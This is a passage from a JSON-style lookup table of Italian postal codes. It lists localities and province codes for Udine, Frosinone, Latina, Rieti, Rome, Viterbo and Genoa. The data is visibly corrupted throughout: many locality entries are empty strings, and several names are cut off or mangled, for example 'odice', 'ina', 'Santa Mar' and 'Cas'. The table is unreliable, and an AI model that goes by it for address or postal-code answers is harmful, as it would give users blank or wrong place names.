["Magredis", "UD"], ["Prepotto", "UD"], ["Primulacco", "UD"], ["Torreano", "UD"], ["Premariacco", "UD"], ["Clodig", "UD"], ], "33041": [["", "UD"], ["Joannis", "UD"]], "33042": [["Buttrio", "UD"]], "33043": [["Purgessimo", "UD"], ["Sanguarzo", "UD"], ["", "UD"]], "33044": [["Manzano", "UD"]], "33045": [["Nimis", "UD"]], "33046": [["Pulfero", "UD"]], "33047": [["Orzano", "UD"], ["Cerneglons", "UD"], ["Ziracco", "UD"], ["Remanzacco", "UD"]], "33048": [ ["", "UD"], ["Chiopris", "UD"], ["Medeuzza", "UD"], ["Dolegnano", "UD"], ["", "UD"], ["", "UD"], ], "33049": [["", "UD"]], "33050": [ ["Porpetto", "UD"], ["Clauiano", "UD"], ["Mortegliano", "UD"], ["Chiasellis", "UD"], ["Sammardenchia", "UD"], ["", "UD"], ["Papariano", "UD"], ["Pocenia", "UD"], ["Ruda", "UD"], ["Castello", "UD"], ["Lestizza", "UD"], ["Sevegliano", "UD"], ["Terenzano", "UD"], ["Zugliano", "UD"], ["Carpeneto", "UD"], ["", "UD"], ["Felettis", 
"UD"], ["Ontagnano", "UD"], ["Torviscosa", "UD"], ["Malisana", "UD"], ["Carlino", "UD"], ["Fiumicello", "UD"], ["Gonars", "UD"], ["Precenicco", "UD"], ["", "UD"], ["Galleriano", "UD"], ["Lumignacco", "UD"], ["", "UD"], ["Lavariano", "UD"], ["Perteole", "UD"], ["Sclaunicco", "UD"], ["", "UD"], ["Cargnacco", "UD"], ["", "UD"], ["", "UD"], ["Percoto", "UD"], ["", "UD"], ["", "UD"], ["Risano", "UD"], ["", "UD"], ["", "UD"], ["Nespoledo", "UD"], ["", "UD"], ["Lauzacco", "UD"], ["Tissano", "UD"], ["Torsa", "UD"], ["", "UD"], ["Bicinicco", "UD"], ["Castions Delle Mura", "UD"], ["Ronchis", "UD"], ["", "UD"], ], "33051": [["", "UD"], ["Belvedere", "UD"], ["Aquileia", "UD"]], "33052": [["", "UD"], ["Strassoldo", "UD"]], "33053": [["Pertegada", "UD"], ["Latisana", "UD"], ["Gorgo", "UD"]], "33054": [["", "UD"], ["", "UD"]], "33055": [["", "UD"]], "33056": [["", "UD"]], "33057": [["Sottoselva", "UD"], ["Ialmicco", "UD"], ["Jalmicco", "UD"], ["Palmanova", "UD"]], "33058": [["", "UD"]], "33059": [["", "UD"]], "33061": [["Teor", "UD"], ["", "UD"], ["Rivarotta", "UD"], ["Rivignano", "UD"]], "33100": [ ["Cussignacco", "UD"], ["Laipacco", "UD"], ["Udine", "UD"], ["Baldasseria", "UD"], ["Godia", "UD"], ["Gervasutta", "UD"], ], "03010": [ ["Filettino", "FR"], ["Fumone", "FR"], ["", "FR"], ["Sgurgola", "FR"], ["", "FR"], ["Trivigliano", "FR"], ["Patrica", "FR"], ["Serrone", "FR"], ["Pitocco", "FR"], ["Collepardo", "FR"], ["", "FR"], ["Patoni", "FR"], ["", "FR"], ["", "FR"], ["", "FR"], ["", "FR"], ["Piglio", "FR"], ["", "FR"], ["Acuto", "FR"], ], "03011": [["", "FR"], ["Tecchiena", "FR"], ["Collelavena", "FR"], ["Alatri", "FR"]], "03012": [["", "FR"], ["Anagni", "FR"]], "03013": [["Tofe", "FR"], ["Porciano", "FR"], ["Ferentino", "FR"], ["", "FR"]], "03014": [["Fiuggi", "FR"], ["", "FR"]], "03016": [["Guarcino", "FR"], ["Campocatino", "FR"]], "03017": [["Morolo", "FR"], ["", "FR"]], "03018": [["Paliano", "FR"]], "03019": [["Supino", "FR"]], "03020": [ ["Arnara", "FR"], ["Pastena", "FR"], ["", "FR"], ["Pico", "FR"], ["Strangolagalli", "FR"], ["Torrice", "FR"], ["Vallecorsa", "FR"], ["", "FR"], ["Falvaterra", "FR"], ["", "FR"], ["", "FR"], ["", "FR"], ], "03021": [["Amaseno", "FR"]], "03022": [ ["Scrima", "FR"], ["Rotabile", "FR"], ["", "FR"], ["Casavitola", "FR"], ["", "FR"], ["", "FR"], ["Brecciaro", "FR"], ["", "FR"], ], "03023": [["Ceccano", "FR"]], "03024": [["Ceprano", "FR"]], "03025": [ ["Anitrella", "FR"], ["Colli", "FR"], ["", "FR"], ["Porrino", "FR"], ["Chiaiamari", "FR"], ], "03026": [["Pofi", "FR"]], "03027": [["Ripi", "FR"]], "03028": [["", "FR"]], "03029": [ ["Scifelli", "FR"], ["Colleberardi", "FR"], ["Giglio", "FR"], ["Castelmassimo", "FR"], ["Veroli", "FR"], ["Cotropagno", "FR"], ["", "FR"], ["", "FR"], ["Panetta", "FR"], ["", "FR"], ["Casamari", "FR"], ], "03030": [ ["Santopadre", "FR"], ["", "FR"], ["Broccostella", "FR"], ["", "FR"], ["", "FR"], ["", "FR"], ["Casalattico", "FR"], ["", "FR"], ["Castrocielo", "FR"], ["", "FR"], ["", "FR"], ["", "FR"], ["Vicalvi", "FR"], ["", "FR"], ["Fontechiari", "FR"], ["Castelliri", "FR"], ["Colfelice", "FR"], ["Coldragone", "FR"], ["Pescosolido", "FR"], ["Piumarola", "FR"], ], "03031": [["Aquino", "FR"]], "03032": [["Isoletta", "FR"], ["Arce", "FR"]], "03033": [["Scaffa", "FR"], ["Arpino", "FR"], ["", "FR"]], "03034": [["Casalvieri", "FR"], ["Purgatorio", "FR"], ["Roselli", "FR"]], "03035": [ ["", "FR"], ["", "FR"], ["Collefontana", "FR"], ["San Paolo", "FR"], ], "03036": [["", "FR"]], "03037": [ ["Pontecorvo", "FR"], ["", "FR"], ["Sant'Oliva", "FR"], ["", 
"FR"], ], "03038": [["Roccasecca", "FR"], ["", "FR"], ["Caprile", "FR"]], "03039": [["Sora", "FR"], ["Carnello", "FR"], ["", "FR"]], "03040": [ ["Selvacava", "FR"], ["", "FR"], ["", "FR"], ["Valvori", "FR"], ["", "FR"], ["Gallinaro", "FR"], ["Acquafondata", "FR"], ["Villa Latina", "FR"], ["Picinisco", "FR"], ["San Biagio Saracinisco", "FR"], ["", "FR"], ["Casalcassinese", "FR"], ["", "FR"], ["Pietrafitta", "FR"], ["", "FR"], ["Viticuso", "FR"], ["", "FR"], ["Terelle", "FR"], ["", "FR"], ["Ausonia", "FR"], ["Vallemaio", "FR"], ["", "FR"], ["Settefrati", "FR"], ["Vallerotonda", "FR"], ], "03041": [["", "FR"], ["Sant'Onofrio", "FR"], ["Alvito", "FR"]], "03042": [["Atina", "FR"], ["", "FR"], ["Atina Inferiore", "FR"]], "03043": [ ["odice", "FR"], ["", "FR"], ["Montecassino", "FR"], ["Caira", "FR"], ["Cassino", "FR"], ["", "FR"], ], "03044": [ ["Pacitti", "FR"], ["Sprumaro", "FR"], ["Pastenelle", "FR"], ["Cervaro", "FR"], ["", "FR"], ], "03045": [["Monticelli", "FR"], ["Esperia", "FR"], ["Esperia Inferiore", "FR"]], "03046": [["", "FR"]], "03047": [["", "FR"]], "03048": [["Sant'Apollinare", "FR"]], "03049": [["Olivella", "FR"], ["Valleluce", "FR"], ["", "FR"], ["Portella", "FR"]], "03100": [ ["Frosinone", "FR"], ["", "FR"], ["", "FR"], ["Frosinone Stazione", "FR"], ], "04010": [ ["", "LT"], ["", "LT"], ["Prossedi", "LT"], ["", "LT"], ["Giulianello", "LT"], ["Roccagorga", "LT"], ["", "LT"], ["Pisterzo", "LT"], ["", "LT"], ["Cori", "LT"], ["Bassiano", "LT"], ["Maenza", "LT"], ["Sonnino", "LT"], ["Norma", "LT"], ], "04011": [ ["Fossignano", "LT"], ["Camilleri", "LT"], ["Campoleone", "LT"], ["", "LT"], ["Carano", "LT"], ["Campoverde", "LT"], ["Aprilia", "LT"], ["Casalazara", "LT"], ["Vallelata", "LT"], ["Pantanelle", "LT"], ["", "LT"], ["Cogna", "LT"], ], "04012": [["Le Castella", "LT"], ["", "LT"], ["Cisterna Di Latina", "LT"]], "04013": [ ["Sermoneta", "LT"], ["Monticchio", "LT"], ["Carrara", "LT"], ["", "LT"], ["Doganella", "LT"], ["Lateroporto", "LT"], ["", "LT"], ], "04014": [["Pontinia", "LT"], ["", "LT"]], "04015": [["", "LT"], ["Fossanova", "LT"], ["Priverno", "LT"]], "04016": [["", "LT"], ["Sabaudia", "LT"], ["", "LT"], ["", "LT"]], "04017": [["", "LT"], ["", "LT"]], "04018": [["", "LT"], ["Sezze", "LT"]], "04019": [["Badino", "LT"], ["", "LT"], ["Terracina", "LT"], ["La Fiora", "LT"]], "04020": [ ["Ventotene", "LT"], ["", "LT"], ["Itri", "LT"], ["", "LT"], ["Campodimele", "LT"], ["Grunuovo", "LT"], ["", "LT"], ["", "LT"], ["", "LT"], ["", "LT"], ["Spore", "LT"], ["", "LT"], ], "04021": [["", "LT"], ["San Cataldo", "LT"], ["Castelforte", "LT"], ["", "LT"]], "04022": [["", "LT"], ["San Magno", "LT"], ["Fondi", "LT"]], "04023": [ ["", "LT"], ["Penitro", "LT"], ["Castellonorato", "LT"], ["", "LT"], ["", "LT"], ["Maranola", "LT"], ["Formia", "LT"], ], "04024": [["Gaeta", "LT"]], "04025": [["", "LT"], ["Lenola", "LT"]], "04026": [ ["Scauri", "LT"], ["", "LT"], ["Tremensuoli", "LT"], ["Minturno", "LT"], ["Santa Mar", "LT"], ["", "LT"], ], "04027": [["Ponza", "LT"], ["Le Forna", "LT"]], "04029": [["Sperlonga", "LT"]], "04100": [ ["", "LT"], ["", "LT"], ["", "LT"], ["", "LT"], ["", "LT"], ["", "LT"], ["", "LT"], ["", "LT"], ["Latina", "LT"], ["", "LT"], ["", "LT"], ["Fogliano", "LT"], ["", "LT"], ["", "LT"], ["", "LT"], ["", "LT"], ["", "LT"], ], "02010": [ ["Rivodutri", "RI"], ["", "RI"], ["Micigliano", "RI"], ["Borbona", "RI"], ["", "RI"], ["Labro", "RI"], ["Vallemare", "RI"], ["", "RI"], ["Santa Croce Di Cittareale", "RI"], ["", "RI"], ["Piedicolle", "RI"], ["", "RI"], ["Santa Croce", "RI"], 
["Cittareale", "RI"], ], "02011": [["Accumoli", "RI"], ["Grisciano", "RI"]], "02012": [ ["Torrita", "RI"], ["", "RI"], ["Preta", "RI"], ["Collemoresco", "RI"], ["Amatrice", "RI"], ["Scai", "RI"], ["Sommati", "RI"], ["Santa Giusta", "RI"], ], "02013": [["Antrodoco", "RI"]], "02014": [["Fantauzzi", "RI"], ["Cantalice", "RI"], ["", "RI"]], "02015": [["Cittaducale", "RI"], ["Grotti", "RI"], ["", "RI"], ["", "RI"]], "02016": [ ["", "RI"], ["Leonessa", "RI"], ["", "RI"], ["Piedelpoggio", "RI"], ["Albaneto", "RI"], ["Vindoli", "RI"], ["Terzone", "RI"], ], "02018": [["", "RI"]], "02019": [["Picciame", "RI"], ["", "RI"], ["Posta", "RI"], ["Favischio", "RI"]], "02020": [ ["", "RI"], ["", "RI"], ["Turania", "RI"], ["", "RI"], ["Stipes", "RI"], ["Collegiove", "RI"], ["", "RI"], ["Concerviano", "RI"], ["Nespolo", "RI"], ["Ascrea", "RI"], ["Marcetelli", "RI"], ["Campolano", "RI"], ["", "RI"], ["Roccaranieri", "RI"], ["", "RI"], ["Vaccareccia", "RI"], ], "02021": [ ["Corvaro", "RI"], ["", "RI"], ["Collemaggiore", "RI"], ["Sant'Anatolia", "RI"], ["Villerose", "RI"], ["", "RI"], ["Torano", "RI"], ["Poggiovalle", "RI"], ["Borgorose", "RI"], ], "02022": [["", "RI"]], "02023": [ ["Fiamignano", "RI"], ["", "RI"], ["Sant'Ippolito", "RI"], ["Sant'Agapito", "RI"], ["Santa Lucia", "RI"], ["Peschieta", "RI"], ], "02024": [ ["Pescorocchiano", "RI"], ["Leofreni", "RI"], ["Pace", "RI"], ["", "RI"], ["Sant'Elpidio", "RI"], ], "02025": [ ["Fiumata", "RI"], ["Castelmareri", "RI"], ["Capradosso", "RI"], ["", "RI"], ["", "RI"], ], "02026": [["", "RI"], ["Posticciola", "RI"]], "02030": [ ["", "RI"], ["", "RI"], ["Casaprota", "RI"], ["Collelungo", "RI"], ["ina", "RI"], ["", "RI"], ["", "RI"], ["", "RI"], ["", "RI"], ["", "RI"], ], "02031": [["", "RI"]], "02032": [ ["", "RI"], ["", "RI"], ["", "RI"], ["Talocci", "RI"], ["Coltodino", "RI"], ["Farfa", "RI"], ["", "RI"], ["Canneto", "RI"], ["", "RI"], [" Sabina", "RI"], ["", "RI"], ["", "RI"], ], "02033": [["", "RI"], ["", "RI"]], "02034": [["Bocchignano", "RI"], ["", "RI"]], "02035": [["Orvinio", "RI"]], "02037": [["Fiacchini", "RI"], ["", "RI"], ["Cerdomare", "RI"], ["", "RI"]], "02038": [["Scandriglia", "RI"], ["Ponticelli", "RI"]], "02039": [["Toffia", "RI"]], "02040": [ ["Roccantica", "RI"], ["Vacone", "RI"], ["Cottanello", "RI"], ["", "RI"], ["", "RI"], ["Mompeo", "RI"], ["Configni", "RI"], ["Fianello", "RI"], ["Cantalupo In Sabina", "RI"], ["", "RI"], [" In Sabina", "RI"], ["", "RI"], ["Montebuono", "RI"], ["Salisano", "RI"], ["Tarano", "RI"], ["Selci", "RI"], ["Montasola", "RI"], ], "02041": [["Casperia", "RI"]], "02042": [["Collevecchio", "RI"]], "02043": [ ["Montisola", "RI"], ["Contigliano", "RI"], ["", "RI"], ["San Filippo", "RI"], ], "02044": [["Forano", "RI"], ["", "RI"]], "02045": [["Greccio", "RI"], ["Limiti Di Greccio", "RI"]], "02046": [["Foglia", "RI"], ["", "RI"]], "02047": [ ["", "RI"], ["", "RI"], ["", "RI"], ["", "RI"], ], "02048": [["", "RI"], ["Stimigliano", "RI"], ["", "RI"]], "02049": [[" Sabina", "RI"]], "02100": [ ["", "RI"], ["Rieti", "RI"], ["Casette", "RI"], ["", "RI"], ["", "RI"], ["Vazia", "RI"], ["", "RI"], ["", "RI"], ], "00010": [ ["Poli", "RM"], ["", "RM"], ["", "RM"], ["", "RM"], ["San ", "RM"], ["Casape", "RM"], ["", "RM"], ["San Gregorio ", "RM"], ["", "RM"], ["Setteville", "RM"], ["Marcellina", "RM"], ["Monteflavio", "RM"], ["Moricone", "RM"], ["Montelibretti", "RM"], ], "00011": [["", "RM"]], "00012": [ ["Villalba", "RM"], ["", "RM"], ["", "RM"], ["Villanova", "RM"], ["Albuccione", "RM"], ["Montecelio", "RM"], ["", "RM"], ["", "RM"], 
["Guidonia", "RM"], ], "00013": [ ["Castelchiodato", "RM"], ["", "RM"], ["", "RM"], ["", "RM"], ["", "RM"], ["Mentana", "RM"], ], "00015": [["Monterotondo", "RM"], ["", "RM"]], "00017": [["Nerola", "RM"], ["Acquaviva", "RM"]], "00018": [["", "RM"], ["Cretone", "RM"]], "00019": [ ["", "RM"], ["Pontelucano", "RM"], ["Tivoli", "RM"], ["Arci", "RM"], ["Empolitana", "RM"], ["", "RM"], ["", "RM"], ], "00020": [ ["Jenne", "RM"], ["Agosta", "RM"], ["Pisoniano", "RM"], ["Canterano", "RM"], ["", "RM"], ["", "RM"], ["Ciciliano", "RM"], ["", "RM"], ["Percile", "RM"], ["", "RM"], ["", "RM"], ["", "RM"], ["", "RM"], ["Riofreddo", "RM"], ["", "RM"], ["", "RM"], ["Mandela", "RM"], ["Vallepietra", "RM"], ["Vallinfreda", "RM"], ["", "RM"], ["Sambuci", "RM"], ["Roccagiovine", "RM"], ["Saracinesco", "RM"], ], "00021": [["Affile", "RM"]], "00022": [["", "RM"]], "00023": [["Arsoli", "RM"]], "00024": [["", "RM"]], "00025": [["Gerano", "RM"]], "00026": [["Civitella", "RM"], ["Licenza", "RM"]], "00027": [["Roviano", "RM"]], "00028": [["Subiaco", "RM"]], "00029": [["Vicovaro", "RM"]], "00030": [ ["", "RM"], ["Colonna", "RM"], ["", "RM"], ["Gorga", "RM"], ["Labico", "RM"], ["Montelanico", "RM"], ["", "RM"], ["Guadagnolo", "RM"], ["", "RM"], ["", "RM"], ["", "RM"], ["Genazzano", "RM"], ["Bellegra", "RM"], ["Gavignano", "RM"], ["Roiate", "RM"], ["", "RM"], ], "00031": [["Artena", "RM"], ["Macere", "RM"], ["Colubro", "RM"]], "00032": [["", "RM"]], "00033": [["", "RM"], ["Cave", "RM"]], "00034": [["", "RM"], ["", "RM"], ["Colleferro", "RM"]], "00035": [["", "RM"]], "00036": [["Palestrina", "RM"], ["Carchitti", "RM"]], "00037": [["Segni", "RM"]], "00038": [["Valmontone", "RM"]], "00039": [["", "RM"], ["Zagarolo", "RM"]], "00040": [ ["", "RM"], ["", "RM"], ["", "RM"], ["", "RM"], ["Ardea", "RM"], ["", "RM"], ["Frattocchie", "RM"], ], "00041": [ ["C", "RM"], ["Cecchina", "RM"], ["Pavona Stazione", "RM"], ["", "RM"], ["Pavona", "RM"], ], "00042": [["", "RM"], ["Anzio", "RM"], ["", "RM"], ["", "RM"]], "00043": [["Casabianca", "RM"], ["", "RM"], ["Ciampino", "RM"]], "00044": [["Frascati", "RM"], ["Vermicino", "RM"]], "00045": [["Landi", "RM"], ["Pedica", "RM"], ["", "RM"]], "00046": [["", "RM"], ["Grottaferrata", "RM"]], "00047": [["Marino", "RM"]], "00048": [["Nettuno", "RM"]], "00049": [["Velletri", "RM"]], "00050": [["Testa Di Lepre Di Sopra", "RM"]], "00051": [["La Bianca", "RM"], ["Allumiere", "RM"]], "00052": [ ["Ceri", "RM"], ["", "RM"], ["Cerveteri", "RM"], ["Cerenova", "RM"], ["", "RM"], ["", "RM"], ["", "RM"], ], "00053": [["Civitavecchia", "RM"], ["Aurelia", "RM"], ["", "RM"]], "00054": [ ["Maccarese", "RM"], ["Fregene", "RM"], ["Testa Di Lepre", "RM"], ["", "RM"], ["Fiumicino", "RM"], ["Torrimpietra", "RM"], ["Focene", "RM"], ["", "RM"], ["", "RM"], ["", "RM"], ], "00055": [["", "RM"], ["Ladispoli", "RM"], ["Palo", "RM"]], "00057": [["Malagrotta", "RM"], ["", "RM"]], "00058": [["Santa Marinella", "RM"], ["Santa Severa", "RM"]], "00059": [["Tolfa", "RM"], ["", "RM"]], "00060": [ ["", "RM"], ["Nazzano", "RM"], ["Filacciano", "RM"], ["", "RM"], ["", "RM"], ["", "RM"], ["Belvedere", "RM"], ["", "RM"], ["Bellavista", "RM"], ["", "RM"], ["", "RM"], ["Formello", "RM"], ["", "RM"], ["Capena", "RM"], ["", "RM"], ["", "RM"], ["Riano", "RM"], ["Sant'Oreste", "RM"], ["", "RM"], ["", "RM"], ["Terrazze", "RM"], ["Montevirginio", "RM"], ["Girardi", "RM"], ["", "RM"], ["Sacrofano", "RM"], ], "00061": [["", "RM"]], "00062": [["Bracciano", "RM"], ["Rinascente", "RM"], ["", "RM"], ["", "RM"]], "00063": [["", "RM"]], "00065": 
[["Feronia", "RM"], ["", "RM"]], "00066": [["Manziana", "RM"], ["Quadroni", "RM"]], "00067": [["Morlupo", "RM"]], "00068": [["", "RM"]], "00069": [["Vicarello", "RM"], ["", "RM"]], "00071": [["", "RM"], ["", "RM"], ["Pomezia", "RM"], ["Torvaianica", "RM"]], "00072": [["Ariccia", "RM"], ["Galloro", "RM"]], "00073": [["", "RM"], ["", "RM"]], "00074": [["Nemi", "RM"]], "00075": [["Pascolare", "RM"], ["Lanuvio", "RM"]], "00076": [["Lariano", "RM"]], "00077": [["", "RM"], ["Molara", "RM"], ["Montecompatri", "RM"]], "00078": [["", "RM"], ["Armetta", "RM"]], "00079": [["", "RM"], ["", "RM"]], "00118": [["Roma", "RM"]], "00119": [["Roma", "RM"], ["Ostica", "RM"]], "00120": [["Roma", "RM"]], "00121": [["Roma", "RM"], ["Lido Di Ostia Ponente", "RM"]], "00122": [["Roma", "RM"], ["", "RM"], ["", "RM"], ["", "RM"]], "00123": [["La Storta", "RM"], ["Roma", "RM"], ["", "RM"]], "00124": [["Cas", "RM"], ["Roma", "RM"]], "00125": [["Acilia", "RM"], ["Roma", "RM"]], "00126": [["Roma", "RM"]], "00127": [["Risaro", "RM"], ["Roma", "RM"], ["Mezzocammino", "RM"], ["Vitinia", "RM"]], "00128": [ ["Roma", "RM"], ["", "RM"], ["", "RM"], ["Malpasso", "RM"], ["", "RM"], ], "00131": [["Roma", "RM"], ["Settecamini", "RM"]], "00132": [ ["Roma", "RM"], ["", "RM"], ["", "RM"], ["", "RM"], ], "00133": [["", "RM"], ["", "RM"], ["Roma", "RM"], ["Torrenova", "RM"]], "00134": [["", "RM"], ["", "RM"], ["Roma", "RM"]], "00135": [["Roma", "RM"], ["", "RM"], ["", "RM"]], "00136": [["Roma", "RM"]], "00137": [["Roma", "RM"]], "00138": [ ["", "RM"], ["Roma", "RM"], ["Marcigliana", "RM"], ["", "RM"], ["Settebagni", "RM"], ], "00139": [["Roma", "RM"]], "00141": [["Roma", "RM"]], "00142": [["Roma", "RM"]], "00143": [["Roma", "RM"], ["Cecchignola", "RM"]], "00144": [["Roma", "RM"], ["Decima", "RM"]], "00145": [["Roma", "RM"]], "00146": [["Roma", "RM"]], "00147": [["Roma", "RM"]], "00148": [["", "RM"], ["Roma", "RM"], ["Magliana Trullo", "RM"]], "00149": [["Roma", "RM"]], "00151": [["Roma", "RM"]], "00152": [["Roma", "RM"]], "00153": [["Roma", "RM"]], "00154": [["Roma", "RM"]], "00155": [["La Rustica", "RM"], ["Tor Sapienza", "RM"], ["Roma", "RM"]], "00156": [["Roma", "RM"], ["Rebibbia", "RM"]], "00157": [["Roma", "RM"]], "00158": [["Roma", "RM"]], "00159": [["Roma", "RM"]], "00161": [["Roma", "RM"]], "00162": [["Roma", "RM"]], "00163": [["Roma", "RM"]], "00164": [["Roma", "RM"]], "00165": [["Roma", "RM"]], "00166": [["Roma", "RM"], ["", "RM"]], "00167": [["Roma", "RM"]], "00168": [["Roma", "RM"]], "00169": [["Roma", "RM"], ["Torre Maura", "RM"], ["Torre Spaccata", "RM"]], "00171": [["Roma", "RM"]], "00172": [["Roma", "RM"]], "00173": [["Roma", "RM"]], "00174": [["Roma", "RM"]], "00175": [["Roma", "RM"]], "00176": [["Roma", "RM"]], "00177": [["Roma", "RM"]], "00178": [["Roma", "RM"], ["Torricola", "RM"], ["Capannelle", "RM"]], "00179": [["Roma", "RM"]], "00181": [["Roma", "RM"]], "00182": [["Roma", "RM"]], "00183": [["Roma", "RM"]], "00184": [["Roma", "RM"]], "00185": [["Roma", "RM"]], "00186": [["Roma", "RM"]], "00187": [["Roma", "RM"]], "00188": [["Labaro", "RM"], ["Prima Porta", "RM"], ["Roma", "RM"]], "00189": [["Roma", "RM"], ["", "RM"], ["Grottarossa", "RM"]], "00191": [["Roma", "RM"]], "00192": [["Roma", "RM"]], "00193": [["Roma", "RM"]], "00194": [["Roma", "RM"]], "00195": [["Roma", "RM"]], "00196": [["Roma", "RM"]], "00197": [["Roma", "RM"]], "00198": [["Roma", "RM"]], "00199": [["Roma", "RM"]], "01010": [ ["", "VT"], ["Blera", "VT"], ["", "VT"], ["Vejano", "VT"], ["", "VT"], ["Gradoli", "VT"], ["Piansano", "VT"], ["Tessennano", 
"VT"], ["Capodimonte", "VT"], ["", "VT"], ["Cellere", "VT"], ["Onano", "VT"], ["Marta", "VT"], ["Farnese", "VT"], ["", "VT"], ["Latera", "VT"], ["", "VT"], ["", "VT"], ], "01011": [["Musignano", "VT"], ["Canino", "VT"]], "01012": [["", "VT"], ["Capranica", "VT"]], "01014": [["", "VT"], ["", "VT"]], "01015": [["Sutri", "VT"]], "01016": [["Tarquinia", "VT"], ["", "VT"], ["", "VT"]], "01017": [["Tuscania", "VT"]], "01018": [["Valentano", "VT"]], "01019": [ ["", "VT"], ["Pietrara", "VT"], ["Giardino", "VT"], ["", "VT"], ["Cura", "VT"], ["Vetralla", "VT"], ], "01020": [ ["Bomarzo", "VT"], ["Lubriano", "VT"], ["Celleno", "VT"], ["Casenuove", "VT"], ["", "VT"], ["Sipicciano", "VT"], ["Proceno", "VT"], ["Mugnano", "VT"], ["", "VT"], ["", "VT"], ["Graffignano", "VT"], ], "01021": [["Acquapendente", "VT"], ["", "VT"], ["Trevinano", "VT"]], "01022": [["Civita", "VT"], ["Bagnoregio", "VT"], ["Vetriolo", "VT"], ["", "VT"]], "01023": [["Bolsena", "VT"]], "01024": [["Castiglione In Teverina", "VT"], ["Sermugnano", "VT"]], "01025": [["", "VT"]], "01027": [["Le Mosse", "VT"], ["Montefiascone", "VT"], ["Zepponami", "VT"]], "01028": [["Orte Scalo", "VT"], ["Orte", "VT"], ["Orte Stazione", "VT"]], "01030": [ ["", "VT"], ["Vitorchiano Stazione", "VT"], ["Vitorchiano", "VT"], ["Vallerano", "VT"], ["Corchiano", "VT"], ["Vasanello", "VT"], ["Bassano In Teverina", "VT"], ["", "VT"], ["Carbognano", "VT"], ["Canepina", "VT"], ["Monterosi", "VT"], ["Calcata", "VT"], ["Faleria", "VT"], ["Calcata Nuova", "VT"], ], "01032": [["Caprarola", "VT"]], "01033": [ ["Borghetto", "VT"], ["Civita Castellana Stazione", "VT"], ["Borghetto Di Civita Castellana Stazione", "VT"], ["Civita Castellana", "VT"], ], "01034": [["Regolelli", "VT"], ["Fabrica Di Roma", "VT"]], "01035": [["Scalo Teverina", "VT"], ["Gallese", "VT"]], "01036": [["Nepi", "VT"]], "01037": [["", "VT"], ["Ronciglione", "VT"]], "01038": [["", "VT"], ["Chia", "VT"]], "01039": [["Vignanello", "VT"]], "01100": [ ["Fastello", "VT"], ["Viterbo", "VT"], ["Tobia", "VT"], ["Magugnano", "VT"], ["", "VT"], ["", "VT"], ["", "VT"], ["Roccalvecce", "VT"], ["Bagnaia", "VT"], ], "16010": [ ["Prelo", "GE"], ["Tiglieto", "GE"], ["Castagna", "GE"], ["Savignone", "GE"], ["Acquasanta", "GE"], ["Rossiglione", "GE"], ["Crocefieschi", "GE"], ["Mele", "GE"], ["Manesseno", "GE"], ["Isorelle", "GE"], ["", "GE"], ["Pedemonte", "GE"], ["Carsi", "GE"], ["Masone", "GE"], ["'", "GE"], ["Valbrevenna", "GE"], ["Sant'Olcese", "GE"], ["Vobbia", "GE"], ["Piccarello", "GE"], ["Mainetto", "GE"], ["'", "GE"], ], "16011": [["", "GE"], ["Arenzano", "GE"]], "16012": [["Busalla", "GE"], ["Sarissola", "GE"], ["Camarza", "GE"]], "16013": [["Campo Ligure", "GE"]], "16014": [ ["Geo", "GE"], ["Langasco", "GE"], ["Isoverde", "GE"], ["Guardia", "GE"], ["Ceranesi", "GE"], ["Pontasso", "GE"], ["Ferriera", "GE"], ["Campomorone", "GE"], ["", "GE"], ], "16015": [["Orero", "GE"], ["Casella", "GE"]], "16016": [["Sciarborasca", "GE"], ["Lerca", "GE"], ["Cogoleto", "GE"]], "16017": [["", "GE"]], "16018": [["Giovi", "GE"], ["Mignanego", "GE"]], "16019": [["Pieve", "GE"], ["", "GE"], ["", "GE"]], "16020": [["Fascia", "GE"], ["Cassingheno", "GE"], ["Gorreto", "GE"], ["Fontanarossa", "GE"]], "16021": [["Bargagli", "GE"]], "16022": [["Davagna", "GE"], ["Moranego", "GE"], ["Scoffera", "GE"], ["Meco", "GE"]], "16023": [["", "GE"], ["Canale", "GE"], ["Fontanigorda", "GE"], ["Casoni", "GE"]], "16024": [["Lumarzo", "GE"]], "16025": [["Rondanina", "GE"], ["", "GE"], ["Montebruno", "GE"]], "16026": [["Trefontane", "GE"], ["Montoggio", 
"GE"]], "16027": [["Propata", "GE"]], "16028": [["Casanova", "GE"], ["Rovegno", "GE"]], "16029": [["", "GE"], ["Torriglia", "GE"], ["Laccio", "GE"]], "16030": [ ["Zoagli", "GE"], ["Sori", "GE"], ["Sant'Anna", "GE"], ["Capreno", "GE"], ["Uscio", "GE"], ["", "GE"], ["Testana", "GE"], ["Bargone", "GE"], ["Canepa", "GE"], ["Moneglia", "GE"], ["", "GE"], ["Cogorno", "GE"], ["Tribogna", "GE"], ["", "GE"], ["San Salvatore", "GE"], ["", "GE"], ["Avegno", "GE"], ["Velva", "GE"], ], "16031": [["", "GE"], ["Bogliasco", "GE"], ["", "GE"]], "16032": [ ["", "GE"], ["", "GE"], ["", "GE"], ["Camogli", "GE"], ["", "GE"], ["Ruta", "GE"], ], "16033": [["Lavagna", "GE"], ["Cavi", "GE"]], "16034": [["Portofino", "GE"]], "16035": [["", "GE"], ["", "GE"], ["Rapallo", "GE"]], "16036": [["Recco", "GE"]], "16038": [["", "GE"], ["Paraggi", "GE"], ["", "GE"]], "16039": [ ["", "GE"], ["", "GE"], ["", "GE"], ["", "GE"], ], "16040": [ ["Celesia", "GE"], ["Leivi", "GE"], ["San Colombano Certenoli", "GE"], ["", "GE"], ["Calvari", "GE"], ["Piandifieno", "GE"], ["Ognio", "GE"], ["Neirone", "GE"], ["", "GE"], ["Statale", "GE"], ["Ne", "GE"], ["Roccatagliata", "GE"], ["Isolona", "GE"], ["Orero", "GE"], ["Reppia", "GE"], ["Conscenti", "GE"], ["", "GE"], ], "16041": [ ["Giaiette", "GE"], ["", "GE"], ["Bertigaro", "GE"], ["Borzonasca", "GE"], ["Brizzolara", "GE"], ], "16042": [["Carasco", "GE"], ["Rivarola", "GE"], ["Graveglia", "GE"]], "16043": [["", "GE"], ["Chiavari", "GE"], ["Caperana", "GE"]], "16044": [["Cicagna", "GE"], ["Monleone", "GE"]], "16045": [["Lorsica", "GE"]], "16046": [["", "GE"], ["Borgonovo", "GE"], ["", "GE"], ["Mezzanego", "GE"]], "16047": [["Moconesi", "GE"], ["Gattorna", "GE"], ["Ferrada", "GE"]], "16048": [ ["Rezzoaglio", "GE"], ["Priosa", "GE"], ["Parazzuolo", "GE"], ["Magnasco", "GE"], ["Cabanne", "GE"], ["Alpepiana", "GE"], ], "16049": [["Amborzasco", "GE"], ["Allegrezze", "GE"], ["", "GE"]], "16100": [["Genova", "GE"]], "16121": [["Genova", "GE"]], "16122": 